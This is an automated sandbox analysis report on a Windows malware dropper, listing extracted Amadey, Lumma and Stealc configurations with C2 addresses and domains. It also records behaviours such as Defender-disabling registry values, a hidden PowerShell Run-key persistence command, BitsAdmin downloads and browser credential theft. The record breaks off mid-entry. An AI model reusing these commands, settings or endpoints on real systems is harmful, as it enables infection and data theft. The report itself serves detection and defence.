Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 03:51
Static task
static1
Behavioral task
behavioral1
Sample
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
Resource
win10v2004-20241007-en
General
-
Target
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
-
Size
1.8MB
-
MD5
50a4af673c3038f686865c6698427e13
-
SHA1
587c30e231c7163741adc14582d5a4792f823722
-
SHA256
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551
-
SHA512
fe92fd5ba8c04638d03d4db073d1d34c3ece1181f3f5e3865745ec7143900073b87e8c82cc127bfd7f1176cb24cb4d5607e4eb6c8bf68b52943ec3b8392af188
-
SSDEEP
49152:idXfSF0PLhbT4JKX7m6teFvYFI+Xb8PRDhO4IJJOmPF:SfSFILyJE7m6svY2+XYPRDhO4kJOmt
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Processes:
a43a749c76.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a43a749c76.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a43a749c76.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a43a749c76.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a43a749c76.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a43a749c76.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a43a749c76.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
Processes:
552420d9a1.exeeb96d7e10f.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 552420d9a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF eb96d7e10f.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
Processes:
skotes.exeskotes.exenbea1t8.exe552420d9a1.exedcb24ae08a.exeeb96d7e10f.exea7ad7cb257.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exe3a3927d69a.exea43a749c76.exeskotes.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nbea1t8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 552420d9a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dcb24ae08a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eb96d7e10f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a7ad7cb257.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a3927d69a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a43a749c76.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid Process 75 3636 powershell.exe 76 3636 powershell.exe 78 3636 powershell.exe 81 3636 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid Process 4112 powershell.exe 624 powershell.exe 3636 powershell.exe 4112 powershell.exe 624 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2844 bitsadmin.exe 2932 bitsadmin.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
Processes:
msedge.exemsedge.exechrome.exechrome.exechrome.exemsedge.exemsedge.exechrome.exemsedge.exepid Process 4164 msedge.exe 2584 msedge.exe 4156 chrome.exe 4132 chrome.exe 2380 chrome.exe 5480 msedge.exe 5468 msedge.exe 884 chrome.exe 5940 msedge.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
552420d9a1.exeeb96d7e10f.exea43a749c76.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exedcb24ae08a.exeskotes.exenbea1t8.exeskotes.exe3a3927d69a.exea7ad7cb257.exeskotes.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 552420d9a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eb96d7e10f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eb96d7e10f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a43a749c76.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dcb24ae08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a43a749c76.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a3927d69a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a7ad7cb257.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 552420d9a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dcb24ae08a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a3927d69a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a7ad7cb257.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeMSIA3E4.tmprWmzULI.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation MSIA3E4.tmp Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation rWmzULI.exe -
Drops startup file 1 IoCs
Processes:
msiexec.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemCare1.0.lnk msiexec.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 21 IoCs
Processes:
skotes.exeTaskbarMonitorInstaller.exeskotes.exenbea1t8.exetvtC9D3.exeuxN4wDZ.exeuxN4wDZ.exeuxN4wDZ.exeTcMBq5M.exeskotes.exerWmzULI.exeSystemCare1.0.exeMSIA3E4.tmp552420d9a1.exedcb24ae08a.exeeb96d7e10f.exe3a3927d69a.exea7ad7cb257.exebf76d50978.exea43a749c76.exeskotes.exepid Process 4824 skotes.exe 4812 TaskbarMonitorInstaller.exe 4044 skotes.exe 2100 nbea1t8.exe 3872 tvtC9D3.exe 4184 uxN4wDZ.exe 4892 uxN4wDZ.exe 4908 uxN4wDZ.exe 1056 TcMBq5M.exe 3616 skotes.exe 4904 rWmzULI.exe 776 SystemCare1.0.exe 2280 MSIA3E4.tmp 1732 552420d9a1.exe 4828 dcb24ae08a.exe 5516 eb96d7e10f.exe 5808 3a3927d69a.exe 4184 a7ad7cb257.exe 5592 bf76d50978.exe 4640 a43a749c76.exe 2120 skotes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
skotes.exeskotes.exe552420d9a1.exedcb24ae08a.exea7ad7cb257.exeskotes.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exenbea1t8.exeeb96d7e10f.exe3a3927d69a.exea43a749c76.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine 552420d9a1.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine dcb24ae08a.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine a7ad7cb257.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine nbea1t8.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine eb96d7e10f.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine 3a3927d69a.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Wine a43a749c76.exe -
Loads dropped DLL 27 IoCs
Processes:
regasm.exetvtC9D3.exeMsiExec.exeMsiExec.exeSystemCare1.0.exepid Process 4848 regasm.exe 4848 regasm.exe 4848 regasm.exe 4848 regasm.exe 3872 tvtC9D3.exe 3872 tvtC9D3.exe 3872 tvtC9D3.exe 4260 MsiExec.exe 4260 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Processes:
a43a749c76.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a43a749c76.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a43a749c76.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
nbea1t8.exeskotes.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1009905001\\nbea1t8.exe'\"" nbea1t8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3a3927d69a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010120001\\3a3927d69a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a7ad7cb257.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010121001\\a7ad7cb257.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf76d50978.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010122001\\bf76d50978.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a43a749c76.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010123001\\a43a749c76.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeTcMBq5M.exemsiexec.exedescription ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\K: TcMBq5M.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: TcMBq5M.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: TcMBq5M.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/files/0x000200000001e413-634.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exenbea1t8.exeskotes.exe552420d9a1.exedcb24ae08a.exeeb96d7e10f.exe3a3927d69a.exea7ad7cb257.exea43a749c76.exeskotes.exepid Process 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 4824 skotes.exe 4044 skotes.exe 2100 nbea1t8.exe 3616 skotes.exe 1732 552420d9a1.exe 4828 dcb24ae08a.exe 5516 eb96d7e10f.exe 5808 3a3927d69a.exe 4184 a7ad7cb257.exe 4640 a43a749c76.exe 2120 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
uxN4wDZ.exedescription pid Process procid_target PID 4184 set thread context of 4908 4184 uxN4wDZ.exe 105 -
Drops file in Program Files directory 4 IoCs
Processes:
TaskbarMonitorInstaller.exedescription ioc Process File created C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\Newtonsoft.Json.dll TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\TaskbarMonitorWindows11.exe TaskbarMonitorInstaller.exe File created C:\Program Files\TaskbarMonitor\TaskbarMonitorInstaller.exe TaskbarMonitorInstaller.exe -
Drops file in Windows directory 17 IoCs
Processes:
msiexec.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exedescription ioc Process File created C:\Windows\Installer\e587fab.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8201.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI89B3.tmp msiexec.exe File created C:\Windows\Tasks\skotes.job aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe File opened for modification C:\Windows\Installer\MSI80E4.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIA3E4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8037.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8162.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI81E1.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06} msiexec.exe File opened for modification C:\Windows\Installer\MSI8EB5.tmp msiexec.exe File opened for modification C:\Windows\Installer\e587fab.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8192.tmp msiexec.exe File created C:\Windows\Installer\e587faf.msi msiexec.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 5004 4828 WerFault.exe 134 -
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
552420d9a1.exeeb96d7e10f.exetaskkill.exetaskkill.execmd.exetvtC9D3.exebitsadmin.exeMsiExec.exepowershell.exedcb24ae08a.exetaskkill.exenbea1t8.exeTcMBq5M.exemsiexec.exeschtasks.exepowershell.exeuxN4wDZ.exeMsiExec.exeSystemCare1.0.execmd.exebf76d50978.exetaskkill.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exebitsadmin.exea7ad7cb257.exea43a749c76.exeMSIA3E4.tmp3a3927d69a.exepowershell.exerWmzULI.exetimeout.exeskotes.exeping.exeuxN4wDZ.exetaskkill.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 552420d9a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb96d7e10f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dcb24ae08a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nbea1t8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SystemCare1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf76d50978.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a7ad7cb257.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a43a749c76.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSIA3E4.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a3927d69a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rWmzULI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000009fc5eef0dbaffe7c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800009fc5eef00000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809009fc5eef0000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d9fc5eef0000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000009fc5eef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
